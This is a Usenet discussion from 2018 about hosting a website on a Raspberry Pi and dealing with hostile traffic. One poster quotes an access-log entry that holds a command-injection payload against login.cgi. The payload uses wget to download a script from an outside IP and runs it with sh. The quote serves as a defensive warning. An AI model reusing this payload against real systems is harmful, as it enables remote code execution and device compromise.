On 21/06/18 10:35, Jan Panteltje wrote:
> On a sunny day (Wed, 20 Jun 2018 14:43:04 GMT) it happened
> wrote in :
>
>> On a sunny day (Tue, 19 Jun 2018 23:59:01 -0700 (PDT)) it happened Roger Law
>> wrote in
>> :
>>
>>> I don't understand why I must not consider rpi as a small server.
>>
>> Yes it is possible to run a raspi (even an old model) as webserver.
>> here is my website hosted by the ISP:
>> http://panteltje.com/index1.html
>>
>> and here it is running on a very old raspi (the one with only 2 USB
connectors)
>> that at the same time runs an IP security webcam:
>> http://217.120.43.67/index1.html
>>
>> Actually curious if you can see it at all, it is my backup if godaddy
webhosting goes down.
>>
>> But.. no Java, simple html, as it should be ;-)
>>
>> Backup is offline at night after 19:00 UTC so YMMV.
>> I just got 3.57 MB/s downloading a HD movie from that raspi apache
webserver.
>
>
> A warning!!!
> If you run apache webserver, make sure you use a decent firewall,
> I have been watching traffic for a while now to the raspi server after I
posted the link,
> and see Russian and other countries hackers trying things, looking for a way
to cause havoc:
> 31.207.194.8 - - [21/Jun/2018:10:45:37 +0200] "GET
/login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;s
h%20/tmp/r%27$ HTTP/1.1" 404 499 "-" "Hello, World"
>
> From
> https://www.iplocation.net/
> 31.207.194.8 Russian Federation Chelyabinskaya oblast'
Chelyabinsk
>
> Then I transferred the iptables file from by big server after seeing this,
> and all those bad IPs have no longer access, or for a very short time..
> We know who you are!
> Wrote a lot of 'protection' scripts in the days when the servers were located
here.
>
> This is actually the reason I am now using godaddy webhosting, as there are
more fun things to do than watching
> tail -n 100 -f /var/log/apache2/access.log
> every few minutes.
> The internet if full of lifeforms and bost trying things...
>
> man iptables
>
> There is also a simple program ip_to_country you can download from my site,
but has not been updated in many years,
> even forgot I wrote it, when I was looking for a new version google led me to
my own website, ?? found out I wrote it....
> LOL
> OK, on the to-do list
>
I do run IPtables on my million hit a day apache server, but frankly its
only use is to allow my (fixed) IP address unrestricted accaess.
Apache itself if configured correctly will take any amount of abuse.
I just let it happen.
Only if DOS attacks slow the server unacceptably do I take any action.
Malware and ratware is a fact of life. Its only an issue if its an
issue, so to speak!
--
Truth welcomes investigation because truth knows investigation will lead
to converts. It is deception that uses all the other techniques.
--- SoupGate-Win32 v1.05
* Origin: Agency HUB, Dunedin - New Zealand | FidoUsenet Gateway (3:770/3)
|